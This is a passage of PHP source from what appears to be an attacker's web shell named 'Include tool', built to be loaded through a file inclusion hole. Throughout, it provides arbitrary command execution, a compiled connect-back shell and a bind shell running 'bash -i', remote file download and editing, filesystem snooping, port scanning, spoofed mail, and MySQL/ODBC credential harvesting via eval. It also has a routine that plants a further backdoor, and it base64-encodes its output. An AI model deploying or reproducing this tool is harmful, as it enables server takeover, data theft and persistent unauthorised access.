0, "filecopy" => 0, "fileedit" => 0, "showsource" => 0, "snoop" => 0, "cmdln" => 0, "connectback" => 0, "phpshell" => 0, "servicecheck" => 0, "mysqlaccess" => 0, "mail" => 0, "env" => 0, "phpenv" => 0, "phpinfo" => 0, "dumpvars" => 0, "debugscript" => 0, "syslog" => 0 ); # init navigation foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val; # set default values $ArrDefaults = array( "filecopy_source" => "http://...", "filecopy_dest" => getcwd(), "cmdcall" => "", "editfile" => getcwd(), "editcontent" => "", "chdir" => ".", "vsource" => $SCRIPT_FILENAME, "mail_from" => "attacker@0wned.org", "mail_to" => "", "mail_subject" => "", "mail_attach_source" => "http://....", "mail_attach_appear" => "filename...", "mail_content_type" => "image/png", "mail_msg" => "", "tcpports" => "21 22 23 25 80 110", "timeout" => 5, "miniinc_loc" => getcwd() . "/miniinc.php", "incdbhost" => "localhost", "cbhost" => $_SERVER['REMOTE_ADDR'], "cbport" => 20202, "cbtempdir" => "/tmp", "cbcompiler" => "gcc", "phpshellapp" => "export TERM=xterm; bash -i", "phpshellhost" => "0.0.0.0", "phpshellport" => "20202" ); # init defaults foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val; # define executable functions $Mstr = array( 0 => "No execute functions available!", 1 => "passthru()", 2 => "system()", 3 => "backticks", 4 => "proc_open()", 5 => "exec()" ); # clean request to avoid uri monster $SREQ = ""; $reqdat = array(); $tmpCount=0; foreach($REQUESTS as $key => $val){ if($tmpCount==0) $reqdat[] = $key."=".$val; else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val; $tmpCount++; } $SREQ = implode("&", $reqdat); $tmpCount=0; if($SREQ=="") { $tmp_req = array(); $tmp_qry = explode("&", $QUERY_STRING); foreach($tmp_qry as $key => $val) { $tmp_val = explode("=", $val); if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; $tmpCount++; } $SREQ = implode("&", $tmp_req); } if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot']; # set some defaults to avaoid errors $is_file = array(); $is_dir = array(); $is_w_dir = array(); $is_w_file = array(); $emeth=0; if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/"; $chdir = str_replace("//", "/", $chdir); if(substr($chdir, -1) != "/") $chdir .= "/"; ## # Setup wether to use PHP_SELF or SCRIPT_NAME if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF; else $MyLoc = $SCRIPT_NAME; # $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc; $MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc; # This is a list of internal inc.inc vars that do not get displayed # inside the dumpvars function (poss for a debug func later?) $DebugArr = array( 'ARHGFDGFGASDFG', 'safe_mode', 'register_globals', 'magic_quotes_gpc', 'txt', 'lang', 'SM', 'RG', 'MQ', 'ArrFuncs', 'val', 'key', 'env', 'phpenv', 'phpinfo', 'debugscript', 'filecopy', 'fileedit', 'showsource', 'snoop', 'mail', 'cmdln', 'syslog', 'servicecheck', 'dropinc', 'mysqlaccess', 'ArrDefaults', 'filecopy_source', 'filecopy_dest', 'cmdcall', 'editfile', 'editcontent', 'chdir', 'vsource', 'mail_from', 'mail_to', 'mail_subject', 'mail_attach_source', 'mail_attach_appear', 'mail_content_type', 'mail_msg', 'tcpports', 'timeout', 'miniinc_loc', 'incdbhost', 'Mstr', 'SREQ', 'reqdat', 'tmpCount', 'is_file', 'is_dir', 'is_w_dir', 'is_w_file', 'emeth', 'MyLoc', 'dumpvarsare', 'DebugArr', 'cbtempdir', 'cbcompiler', 'cbhost', 'cbport', 'phpshelltype', 'phpshellapp', 'phpshellhost', 'phpshellport' ); # activate syslog entry if($syslog == 1) { # openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0); # drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)"); } ############################################################################### # # start include output # ############################################################################### $strOutput = ""; $strOutput .= "

Include tool

PHP Version: " . phpversion() . " | safe_mode: $SM | register_globals: $RG | magic_quotes_gpc: $MQ | syslogging: "; if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on']; $strOutput .= "

"; foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); ############################################################################### # test cmd shell environment ############################################################################### if($env == 1) { $strOutput .= " "; if($emeth==0) { $strOutput .= ""; } else { $strOutput .= "

cmd infos
test using pwd	"; $emeth =& test_cmd_shell(); $strOutput .= "
$Mstr[$emeth]
exec method	$Mstr[$emeth]
uname -a	" . Mexec("uname -a", $emeth) . "
id	" . Mexec("id", $emeth) . "

"; } } ############################################################################### # test php environment ############################################################################### if($phpenv == 1) { $strOutput .= ""; if(function_exists('posix_uname')) { $posix_uname = posix_uname(); while (list($info, $value) = each ($posix_uname)) { $strOutput .= ""; } } else { $strOutput .= "posix_uname not available"; } $strOutput .= ""; if(function_exists('posix_getuid')) $strOutput .= ""; else $strOutput .= "posix_getuid not available"; if(function_exists('posix_geteuid')) $strOutput .= ""; else $strOutput .= "posix_geteuid not available"; if(function_exists('posix_getgid')) $strOutput .= ""; else $strOutput .= "posix_getgid not available"; $strOutput .= "

php short infos
posix infos
$info	$value
current script user	" . get_current_user() . "
getuid	" . posix_getuid() . "
geteuid	" . posix_geteuid() . "
getgid	" . posix_getgid() . "

"; } ############################################################################### # dump variables ############################################################################### if($dumpvars == 1) { $strOutput .= "

dump variables

" . dd("GLOBALS") . "

"; } ############################################################################### # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!! ############################################################################### if($debugscript == 1) { ?>

debug script

copy file

source

destination

" . copy_file($filecopy_source,$filecopy_dest) . "

"; } ############################################################################### # edit file ############################################################################### if($fileedit == 1) { $strOutput .= "

edit file
file
edit
content	"; if($edit==1 \| $editfile!=$ArrDefaults['editfile']) $strOutput .= show_file($editfile); $strOutput .= "

"; if($edit==1 \| $editfile!=$ArrDefaults['editfile']) $strOutput .= edit_file($editcontent,$editfile,$edit); $strOutput .= "

"; } ############################################################################### # execute cmd shell NEEDS MODIFINY FOR B64 STATUS!! ############################################################################### if($cmdln == 1) { $emeth = test_cmd_shell(); $strOutput .= "

execute cmd execution: " . $cmdcall . "
cmd line

test method with 'pwd'	" . $Mstr[$emeth] . "
"; if($emeth < 3) { $strOutput .= "The output of this command will be somewhere on the page!"; Mexec($cmdcall, $emeth); } else { $strOutput .= Mexec($cmdcall, $emeth); } $strOutput .= "

"; } ############################################################################### # sending mime mail ############################################################################### if($mail == 1) { $strOutput .= "

sending mime mail with attachment
from
to
subject
message	" . $mail_msg . "
attach file
attach content type
file to appear

" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "

"; } ############################################################################### # drop mini inc handling ############################################################################### if($dropinc == 1) { if($loc!="") $miniinc_loc = $loc; $strOutput .= "

drop mini inc hole
source
drop

"; if($minisave==1) $strOutput .= dropminiinc($miniinc_loc); $strOutput .= "

"; } ############################################################################### # connect C back shell handling ############################################################################### if($connectback == 1) { $strOutput .= "

connect back shell
temp dir.
compiler
host
tcp port
execute

"; if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport); $strOutput .= "

"; } ############################################################################### # PHP shell handling ############################################################################### if($phpshell == 1) { $strOutput .= "

PHP shell
type
shell app
host
tcp port
execute

"; if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); $strOutput .= "

"; } ############################################################################### # snooping ############################################################################### if($snoop == 1) { $strOutput .= "

file system snooping: " . $chdir . "
path
" . snoopy($chdir) . "

"; } ############################################################################### # show highlited source ############################################################################### if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) { $strOutput .= "

show source: " . $vsource . "
path

" . highlight_file($vsource, 1) . "

"; } ############################################################################### # service check ############################################################################### if($servicecheck == 1) { if($servhost!="") $host = $servhost; else $host = "localhost"; $strOutput .= "

simple service check
host(s)
tcp port(s)
timeout

"; $hosts = explode(" ", $host); $port = explode(" ",$tcpports); $values = count($port); $numhosts = count($hosts); if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n"; else if($values > 1) $strOutput .= "Checking $values ports..\n"; else $strOutput .= "No ports specified!!\n"; if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n"; else if($numhosts == 1) $strOutput .= "On 1 host..\n"; else $strOutput .= "No hosts specified!!\n"; if($numhosts >= 1) { for($hcount=0; $hcount < $numhosts; $hcount++) { $tmphost = $hosts[$hcount]; $strOutput .= "\nTesting $tmphost..\n"; if(($values == 1 && $port[0] != "") \| $values > 1) { for ($cont=0; $cont < $values; $cont++) { @$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout); $service = getservbyport($port[$cont],"tcp"); @$get = fgets($sock[$cont]); if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n"; flush(); } } } } $strOutput .= "

"; } ############################################################################### # show phpinfo ############################################################################### if($phpinfo == 1){ phpinfo(); } ###################################################################### # db stuff ###################################################################### if($mysqlaccess == 1) { $strOutput .= "

db host
user
pass
name
table
sql query
dumpfile

"; } if($incdbhost!="" && $incdbuser!="") { if($incdbvar!="") $dbh = $incdbhost; else $dbH = $incdbhost; $dbu = $incdbuser; $dbp = $incdbpass; if($incdbsql!="") $dbs = $incdbsql; if($incdbname!="") $dbn = $incdbname; if($incdbtable!="") $dbt = $incdbtable; if($incdbfile!="") $dumpfile = $incdbfile; } if(isset($dbh)) { $strOutput .= ""; eval("\$Gdbhost = \"\$$dbh\";"); eval("\$Gdbuser = \"\$$dbu\";"); eval("\$Gdbpass = \"\$$dbp\";"); eval("\$Gdbname = \"\$$dbn\";"); $strOutput .= "

mysql access

"; if($dbn=="") { $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . "

" . display_dbs($Gdbhost, $Gdbuser, $Gdbpass); } else if(isset($dbs)) { $Gdbsql = $dbs; $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."
sql=".$Gdbsql . "

"; if(isset($dumpfile)) { $strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile); } else { $strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql); } } else if(isset($dbt)) { $Gdbtabl = $dbt; $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl; if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; $strOutput .= "

"; if(isset($dumpfile)) { $strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile); } else { $strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); } } else { $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname . "

" . display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname); } $strOutput .= "

"; } if(isset($dbH)) { $strOutput .= "

mysql access

"; if($dbn=="") { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp. "

". display_dbs($dbH, $dbu, $dbp); } else if(isset($dbs)) { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."
sql=".$dbs. "

"; if(isset($dumpfile)) { $strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile); } else { $strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs); } } else if(isset($dbt)) { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt; if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; $strOutput .= "

"; if(isset($dumpfile)) { $strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile); } else { $strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt); } } else { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn . "

" . display_tables($dbH, $dbu, $dbp, $dbn); } $strOutput .= "

"; } if(isset($Odbh)) { $strOutput .= ""; eval("\$Gdbhost = \"\$$Odbh\";"); eval("\$Gdbuser = \"\$$dbu\";"); eval("\$Gdbpass = \"\$$dbp\";"); eval("\$Gdbname = \"\$$dbn\";"); $strOutput .= "

odbc access

"; if(isset($dbt)) { $Gdbtabl = $dbt; $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl . "

" . display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); } else { $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . "

" . Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass); } $strOutput .= "

"; } if(isset($OdbH)) { $strOutput .= "

odbc access

"; if(isset($dbt)) { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt . "

" . Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt); } else { $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp . "

" . Odisplay_tables($OdbH, $dbu, $dbp); } $strOutput .= "

"; } $strOutput .= ""; $strOutputB64 = chunk_split(base64_encode($strOutput)); echo "\n"; echo '

Include tool

cmd infos

php short infos

dump variables

debug script

copy file

edit file

execute cmd execution: " . $cmdcall . "

sending mime mail with attachment

drop mini inc hole

connect back shell

PHP shell

file system snooping: " . $chdir . "

show source: " . $vsource . "

simple service check